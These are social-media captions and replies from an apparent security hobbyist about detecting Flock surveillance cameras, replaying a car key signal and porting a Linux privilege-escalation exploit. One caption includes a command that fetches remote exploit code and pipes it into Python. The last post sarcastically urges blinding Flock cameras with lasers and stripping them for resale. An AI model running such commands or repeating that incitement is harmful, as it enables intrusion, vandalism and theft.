Jake Swiz

@TigerKittykills Thanks dude! That’s the whole point! My tool allows people to do it themselves and identify/catalog new flock deployments on Deflock as desired.

@JakeSwizzz Or you could just check the website deflock.org

Now anybody with a Flipper Zero and aa spare ESP32 can detect Flock ALPRs and other Flock technology (like “Raven Gunshot Detectors” etc). This technology is in your backyard. Your community. Spying on you, your friends, your neighbors, your children… and we’re just letting this private company funded by billionaires do this? Just this week Flock Safety operators were BUSTED watching CHILDREN at a gymnasium through Flock ALPRs. SICKENING. I’m sick of this technology. I will be conducting about a month maybe more on Flocks security research before I draft a formal white paper and present my findings in front of cities around me. Submitting FOIA requests to ban this technology from our communities. I love law enforcement, they’re amazing and keep our communities safe. But, this technology is a double-edged sword for them. Patrolmen have been caught stalking exes using Flock ALPRs technology. Criminals can also leverage stolen data stored on the ALPRs or in the cloud to know positions of patrolmen. These are not okay. It’s not just the technology that’s unethical, it’s the people operating it too. #swizsecurity #flock #alpr #surveillance #privacy

Breaking into my Audi RS7 using a radio… Side quest Saturday!!! This was NUTS. Swiz Security does not condone illegal or illicit actions. This is strictly for learning and awareness purposes only. Testing performed in this video was done in a controlled manner with limited signal strength to ensure no bystanders were impacted in any way. • • • • • #swizsecurity #hacking #audi #cars #fyp

hacking into my car… You might be asking… “Swiz why??” Well, any car can be broken into without physical brute force if you have the knowledge. I want to learn how it works and find a fix that protects myself and others from criminals that leverage this. This is my RF journey, I’m sure I made some mistakes but I’m still learning deep down I’m just a malware guy. Working through some quirkiness right now where my replayed signal isn’t being emulated correctly over the air… my guess is something to do with modulation since it looks drastically different than what my key is putting out and making sure it’s configured correctly. I’m going to rely on the HackRF One SDR to replay so we can have a more finely tuned signal. All signal strength was greatly reduced so it was only impacting anything within a 10ft radius, nothing and nobody beyond that was impacted. Swiz Security does not condone any illicit or illegal activities. This is strictly for educational and learning purposes. Please don’t do anything illegal and harm others. • • • • • #swizsecurity #hacking #cyber #cars #linux

My first, genuinely unexpected reaction to successfully hacking into my car over the weekend 😂 This was before I understood the attack and encryption 100%. Time to document and see how we can deploy defensive measures against this. P.S. @audiusa, would love a chance to talk to you guys about this! #swizsecurity #explore #cars #audi #fyp

porting the new CopyFail Linux Local Privilege Escalation (LPE) vulnerability from x86 to ARM (AARCH64). The exploit developer released a Proof-of-Concept (PoC) exploit that was only for x86. Yet, confirmed all CPU architectures are impacted. I wanted to put this to the test to make sure it worked. My thought process went a little like this: The original exploit PoC can be obtained via curl https:// copy.fail/exp. This will show you the 732-byte Python file that allows for LPE on your system. However, upon decompressing the zlib compressed data, we are presented with a 160-byte x86 ELF binary (obviously won’t work on AARCH64). However, if you were to fire off the intended exploit: curl copy.fail/exp | python3 && su, the original primitive would still work but you would corrupt your su binary in /bin/su and render it useless until you rebooted. So, I disassembled the ELF binary and took out the syscalls, which is pretty much just setreuid + execve (“/bin/sh”) + exit() shellcode and created a wrapper around it using the ARM ISA/ syntax. I then compressed that AARCH64 ELF via zlib, obtaining a new zlib compressed hex blob. Replaced that in the original PoC an voilà!! We have a shell!! • • • • • #swizsecurity #hacking #fyp #Linux #computerscience

DIY projects & open-source tech 🤝 Tag a friend 🔥 The National Security Agency (NSA) made a rather cryptic yet stern announcement urging Americans to reboot their routers immediately due to malicious foreign nation states hijacking routers through a series of vulnerabilities. The reaction of most people… well, very mixed, to say the least. This is my reaction: I went with my intuition and am trying to mitigate risk as much as possible. This is through means of DIY and open-source technology. Isn’t this DIY Pi router pretty rad? Want to know how I made mine? Stay tuned. • • • • • #swizsecurity #hacking #cyber #privacy #linux

flock running makes cardio 100x more enjoyable had to start off my morning right by fighting mass surveillance right away 🔥 As soon as I improve the accuracy and solve more edge cases of the C5 marauder module for the flipper with my modified firmware on it for wireless 802.11 (wifi) detection capability in pushing it out immediately for you all to have so I can get extra eyes on this to help me improve it. Be on the lookout for it. • • • • • #swizsecurity #running #surveillance #privacy #cardio

that one time I hacked my desk 😂😭 #swizsecurity #hacking #radios #linux #cybersecurity

binary exploitation adventures and dealing with stack alignment issues. #swizsecurity #hacking #binaryexploitation #cybersecurity #linux

binary exploitation fun #swizsecurity #hacking #cybersecurity #linux #computerscience

FirstNet was created to save lives… but you saw it here live, that same spectrum is hosting Flock Safety surveillance infrastructure to spy on US citizens without their consent. getting closer to understanding Flock’s LTE infrastructure. the hardest part was just figuring out which equipment I needed to pull this off, but I think we’re really close to the perfect setup! • • • • • #swizsecurity #hacking #linux #surveillance #privacy

hmm

day 2 of creating near-infinite detection capabilities for mass surveillance technology in our communities for my US citizens 😌 finally think I’m getting closer to being able to curate some reliable detection Flock Safety LTE-specific detection capabilities for everyone. Need to do some more timing testing and verify the integrity of my findings but this is definitely a step in the right direction! • • • • • #swizsecurity #privacy #fyp #flock #surveillance

typical evening: creating near-infinite detections capabilities for local mass surveillance for my fellow Americans 😌 stay tuned while I figure out this 100% LTE-only ALPR. • • • • • #Swizsecurity #hacking #surveillance #flock #privacy

Something worse than Flock Safety?? #swizsecurity #hacking #surveillance #privacy #linux

the quieter you are the more you can hear… the first wave of Flock Safety Ravens, or “gunshot detectors” have been quietly installed in my backyard… first they could only watch us but now they can also hear us. this was absolutely wild because what was supposed to be another typical night of gathering data for my ongoing security research turned out to be the craziest rabbit hole in a minute. before I head out, I plan a route with deflock.org to find the flock safety devices around me. Now, since they’re being sneakier since people like me are catching on, they’re quietly rolling out new mass surveillance tech and hiding it in plain site right in our backyards where many families and children in my community come hang around (high pedestrian traffic area). These Flock Safety Raven devices are labeled and advertised as “gunshot detectors”. They are equipped with high-powered microphones and the programming necessary to alert the local authorities ONLY when something like a gunshot, car accident, or scream is detected. however, being a security researcher I know that in order to effectively pull something like this off… you need to be able to hear EVERYTHING. Yes, that’s including your personal conversations in passing. to my fellow Americans, please wake up. this type of effort takes a village. please help me spread the word. share this with a friend. we can’t keep letting these private companies funded by billionaires to be able to spy on us and our children and children’s children. this is tyranny in the making and already is being abused. • • • • • #swizsecurity #fyp #surveillance #privacy #flock

@TechTonik808 @spacebull You do understand nothing in this video is damaging, incriminating, or illegal right lolll

@JakeSwizzz @spacebull I hope you receive an enormous fine

DO NOT point a minimum 1000nm wavelength green laser at Flock cameras. It will not damage the sensor and render the camera ineffective. Flock cameras DO NOT contain over a half ounce of easily recyclable silver. The camera, router, solar panel, and battery, WILL NOT fetch over $1000 on the secondary market. Flock is purely for your safety with NO OTHER AGENDA.